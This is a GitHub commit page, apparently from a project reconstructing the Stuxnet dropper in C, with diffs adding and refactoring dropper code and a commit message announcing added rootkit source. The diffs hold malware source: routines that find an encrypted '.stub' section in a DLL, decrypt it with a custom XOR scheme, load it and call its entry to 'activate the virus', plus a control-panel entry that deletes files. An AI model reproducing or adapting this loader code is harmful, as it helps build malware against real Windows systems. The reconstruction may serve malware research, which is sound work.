Added rootkit source code (by Amr Thabet).

Code is clearer: - added comments and descriptions - removed useless comments - new variables/constants arrangement - new MACROs Added debug strings. Tested functions.
patricklightsec · Mar 17, 2014 · 5f422dc · 5f422dc
1 parent e0e8cad
commit 5f422dc
Show file tree

Hide file tree

Showing 38 changed files with 2,247 additions and 910 deletions.
diff --git a/src/1. Main.c → dropper/1. Main.c b/src/1. Main.c → dropper/1. Main.c
@@ -1,5 +1,5 @@
 /******************************************************************************************
-  Copyright 2012-2013 Christian Roggia
+  Copyright (C) 2012-2014 Christian Roggia <[email protected]>
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
@@ -14,52 +14,70 @@
    limitations under the License.
 ******************************************************************************************/
 
-#include "data.h"
 #include "3. OS.h"
+#include "config.h"
+#include "StdAfx.h"
+
+HINSTANCE g_hInstDLL = NULL;
 
 // 100% (C) CODE MATCH
 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
 {
-	if(fdwReason && fdwReason == 1) hINSTANCE = hinstDLL;
+	DEBUG_P("DllMain called")
+
+	if(fdwReason && fdwReason == 1)
+		g_hInstDLL = hinstDLL;
+
 	return TRUE;
 }
 
 // 100% (C) CODE MATCH
-BOOL __stdcall DllUnregisterServerEx(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
+BOOL WINAPI DllUnregisterServerEx(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
 {
+	DEBUG_P("DllUnregisterServerEx called")
+
 	if(fdwReason && fdwReason == 1)
 	{
-		hINSTANCE = hinstDLL;
+		g_hInstDLL = hinstDLL;
 		CheckSystemVersion(TRUE);
 	}
 
-	return 0;
+	return FALSE;
 }
 
 // 100% (C) CODE MATCH
-HRESULT __stdcall DllCanUnloadNow(void)
+STDAPI APIENTRY DllCanUnloadNow(void)
 {
-	hINSTANCE = GetModuleHandleW(0);
+	DEBUG_P("DllCanUnloadNow called")
+
+	g_hInstDLL = GetModuleHandleW(0);
 	CheckSystemVersion(TRUE);
+
 	ExitProcess(0);
 }
 
 // 100% (C) CODE MATCH
-HRESULT __stdcall DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv)
+STDAPI APIENTRY DllGetClassObject(const IID *const rclsid, const IID *const riid, LPVOID *ppv)
 {
+	DEBUG_P("DllGetClassObject called")
+
 	CheckSystemVersion(TRUE);
 }
 
 // 100% (C) CODE MATCH
-HRESULT __stdcall DllRegisterServerEx(void)
+STDAPI APIENTRY DllRegisterServerEx(void)
 {
+	DEBUG_P("DllRegisterServerEx called")
+
 	CheckSystemVersion(TRUE);
 	return 1;
 }
 
 // 100% (C) CODE MATCH
-LONG APIENTRY CPlApplet(HWND hwndCPl, UINT uMsg, LPARAM lParam1, LPARAM lParam2)
+LONG WINAPI CPlApplet(HWND hwndCPl, UINT uMsg, LPARAM lParam1, LPARAM lParam2)
 {
+	DEBUG_P("CPlApplet called")
+
 	if(*(DWORD *)(hwndCPl + 2))
 		DeleteFileA(*(LPCSTR *)(hwndCPl + 2));
 
@@ -70,5 +88,7 @@ LONG APIENTRY CPlApplet(HWND hwndCPl, UINT uMsg, LPARAM lParam1, LPARAM lParam2)
 // 100% (C) CODE MATCH
 STDAPI APIENTRY DllGetClassObjectEx(int a1, int a2, int a3, int a4)
 {
+	DEBUG_P("DllGetClassObjectEx called")
+
 	CheckSystemVersion(FALSE);
 }
diff --git a/dropper/2. STUBHandler.c b/dropper/2. STUBHandler.c
@@ -0,0 +1,140 @@
+/******************************************************************************************
+  Copyright (C) 2012-2014 Christian Roggia <[email protected]>
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+******************************************************************************************/
+
+#include "2. STUBHandler.h"
+#include "6. MemorySections.h"
+
+#include "config.h"
+#include "define.h"
+
+// 99% (C) CODE MATCH
+void Core_Load(void)
+{
+	INT32 nCoreLen;			// Length of the section which contains the main DLL
+	LPVOID lpCore;			// The pointer to the section which contains the main DLL
+	HMODULE hCoreModule;	// The pointer to the loaded main DLL
+	TCoreHeader *h;			// Pointer to the header
+
+	// Get the pointer to the section
+	if(!Core_GetDLL(&lpCore, &nCoreLen))
+		return;
+
+	// Get the header
+	h = (TCoreHeader *)lpCore;
+
+	// Decode the section
+	Core_Crypt((BYTE *)((DWORD)lpCore + h->HeaderLength), h->SectionLength);
+
+	// Setup everything and get ready to activate the virus
+	if(Setup(NULL, (LPVOID)((DWORD)lpCore + h->HeaderLength), h->SectionLength, &hCoreModule))
+		return;
+
+	// Activate the virus
+#	define DLL_FUNC(p, a, b)	{ if(p) ((__tLibraryExecEntry)p)(a, b); }
+	DLL_FUNC(GetProcAddress(hCoreModule, ENTRY_FUNC), lpCore, nCoreLen);
+
+	FreeLibrary(hCoreModule);
+}
+
+// 98% (C) CODE MATCH
+void Core_Crypt(BYTE *lpStream, DWORD dwLength)
+{
+	DWORD i = 4, k, j, l;
+
+	for(; i >= 0; i--)
+	{
+		for(k = 0; k < dwLength; k++)
+			lpStream[k] ^= X_CORE_KEY * k;
+
+		for(j = 0; j < dwLength / 2; j++)
+			lpStream[j] ^= lpStream[((dwLength + 1) / 2) + j];
+
+		for(l = dwLength - 1; l >= 1; l--)
+			lpStream[l] -= lpStream[l - 1];
+	}
+}
+
+extern HINSTANCE g_hInstDLL;
+
+// 85% (C) CODE MATCH -> NEED DEBUG
+BOOL Core_GetDLL(LPVOID *ppCore, INT32 *pCoreLen)
+{
+	PIMAGE_NT_HEADERS pImageNT;
+	PIMAGE_SECTION_HEADER pImageSection;
+	INT32 i;
+	DWORD nCoreLen;
+	LPVOID lpCore;
+
+	// Check the DOS header of the DLL (must be "MZ")
+	if(((PIMAGE_DOS_HEADER)g_hInstDLL)->e_magic != MZ_HEADER)
+		return FALSE;
+
+	// Get the pointer to the PE header
+	pImageNT = IMAGE_NT(g_hInstDLL);
+
+	// Check the PE header (must be "PE")
+	if(pImageNT->Signature != PE_HEADER)
+		return FALSE;
+
+	// Get the PE Section Table
+	pImageSection = SECTION_TABLE(pImageNT);
+	i = 0;
+
+	// Get the number of sections (5), if it is 0
+	// or negative the function fails
+	if(pImageNT->FileHeader.NumberOfSections <= 0)
+		return FALSE;
+
+	// Search the section ".stub" where the encrypted dll
+	// is allocated, if not found the function failed
+	while(lstrcmpiA((LPCSTR)pImageSection->Name, X_SECTION_NAME))
+	{
+		++i; ++pImageSection;
+
+		// Index out of range
+		if(i >= pImageNT->FileHeader.NumberOfSections)
+		{
+			DEBUG_P("The core section has not been found.")
+			return FALSE;
+		}
+	}
+
+	// Get the ".stub" section Virtual Size
+	nCoreLen = pImageSection->SizeOfRawData; // (503.808 bytes)
+
+	// Check if the Virtual Size is not too small (VirtualSize < 556)
+	if(nCoreLen < sizeof(TCoreHeader) + sizeof(DWORD))
+	{
+		DEBUG_P("The core is too small.")
+		return FALSE;
+	}
+
+	// Get the ".stub" section RVA (Relative Virtual Address) (g_hInstDLL + 0x6000)
+	lpCore = (LPVOID)(g_hInstDLL + pImageSection->VirtualAddress);
+
+	// Check the header (DWORD) of the RVA section (0xAE39120D)
+	if(*(DWORD *)lpCore != X_SIGNATURE)
+	{
+		DEBUG_P("The core has an invalid signature.")
+		return FALSE;
+	}
+
+	// Remove the header (4 bytes) and put the values in the pointers
+	*ppCore		= (LPVOID)((DWORD)lpCore + sizeof(DWORD));
+	*pCoreLen	= nCoreLen - sizeof(DWORD);
+
+	return TRUE;
+}
diff --git a/src/2. STUBHandler.h → dropper/2. STUBHandler.h b/src/2. STUBHandler.h → dropper/2. STUBHandler.h
@@ -1,5 +1,5 @@
 /******************************************************************************************
-  Copyright 2012-2013 Christian Roggia
+  Copyright (C) 2012-2014 Christian Roggia <[email protected]>
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
@@ -17,15 +17,22 @@
 #ifndef __STUB_HANDLER_H__
 #define __STUB_HANDLER_H__
 
-#include "data.h"
-#include "define.h"
-#include "6. MemorySections.h"
-
-#define STUB_INTEGRITY_MARK 0xAE39120D
-#define STUB_HEADER_LEN     556
-
-void LoadSTUBSection(void);
-void DecryptSTUBSection(char *pSectionSTUB, UINT32 pSectionVirtualSize);
-BOOL LocateSTUBSection(PVOID *pRawSectionSTUB, INT32 *pSectionVirtualSize);
+#include "StdAfx.h"
+
+typedef struct SCoreHeader {
+	DWORD HeaderLength;		// 552
+	DWORD SectionLength;	// 498176
+	DWORD FullLength;		// 498728
+	DWORD dw4;				// 90
+	DWORD dw5;				// 498818 (FullLength + dw4)
+	DWORD dw6;				// 4587
+	DWORD dw7[130];			// {0}
+	DWORD dw137;			// 1
+	DWORD dw138;			// 0
+} TCoreHeader;
+
+void Core_Load(void);
+void Core_Crypt(BYTE *lpStream, DWORD dwLength);
+BOOL Core_GetDLL(LPVOID *ppCore, INT32 *pCoreLen);
 
 #endif
diff --git a/src/3. OS.c → dropper/3. OS.c b/src/3. OS.c → dropper/3. OS.c
@@ -1,5 +1,5 @@
 /******************************************************************************************
-  Copyright 2012-2013 Christian Roggia
+  Copyright (C) 2012-2014 Christian Roggia <[email protected]>
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
@@ -15,24 +15,29 @@
 ******************************************************************************************/
 
 #include "3. OS.h"
+#include "2. STUBHandler.h"
+
+#include "config.h"
 
 /*************************************************************************
 ** This function check that the system is not too old or too new,       **
 ** it works with all the versions of Windows from Windows 2000 to       **
 ** Windows 8 included, in the asm code the function is called with a    **
 ** value (0 and 1) but actually it is not used, maybe it was used in    **
-** the past.                                                            **
+** debug mode.                                                          **
 *************************************************************************/
-void CheckSystemVersion(BOOL bUknownBool)
+void CheckSystemVersion(BOOL bBool)
 {
-	struct _OSVERSIONINFOW sVersionInformation; // [sp+0h] [bp-114h]@1
-
-	sVersionInformation.dwOSVersionInfoSize = sizeof(struct _OSVERSIONINFOW);
-
-	if(!GetVersionExW(&sVersionInformation)) return;
+	OSVERSIONINFO lpSysInfo;
+	lpSysInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
 
-	if(sVersionInformation.dwPlatformId != VER_PLATFORM_WIN32_NT) return;
-	if(sVersionInformation.dwMajorVersion < 5 && sVersionInformation.dwMajorVersion > 6) return;
+	if(!GetVersionEx(&lpSysInfo)
+	|| lpSysInfo.dwPlatformId != VER_PLATFORM_WIN32_NT
+	|| (lpSysInfo.dwMajorVersion < 5 && lpSysInfo.dwMajorVersion > 6))
+	{
+		DEBUG_P("Wrong system version detected.")
+		return;
+	}
 
-	LoadSTUBSection();
+	Core_Load();
 }
diff --git a/src/3. OS.h → dropper/3. OS.h b/src/3. OS.h → dropper/3. OS.h
@@ -1,5 +1,5 @@
 /******************************************************************************************
-  Copyright 2012-2013 Christian Roggia
+  Copyright (C) 2012-2014 Christian Roggia <[email protected]>
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
@@ -17,8 +17,7 @@
 #ifndef __OS_H__
 #define __OS_H__
 
-#include "define.h"
-#include "2. STUBHandler.h"
+#include "StdAfx.h"
 
 void CheckSystemVersion(BOOL bUknownBool);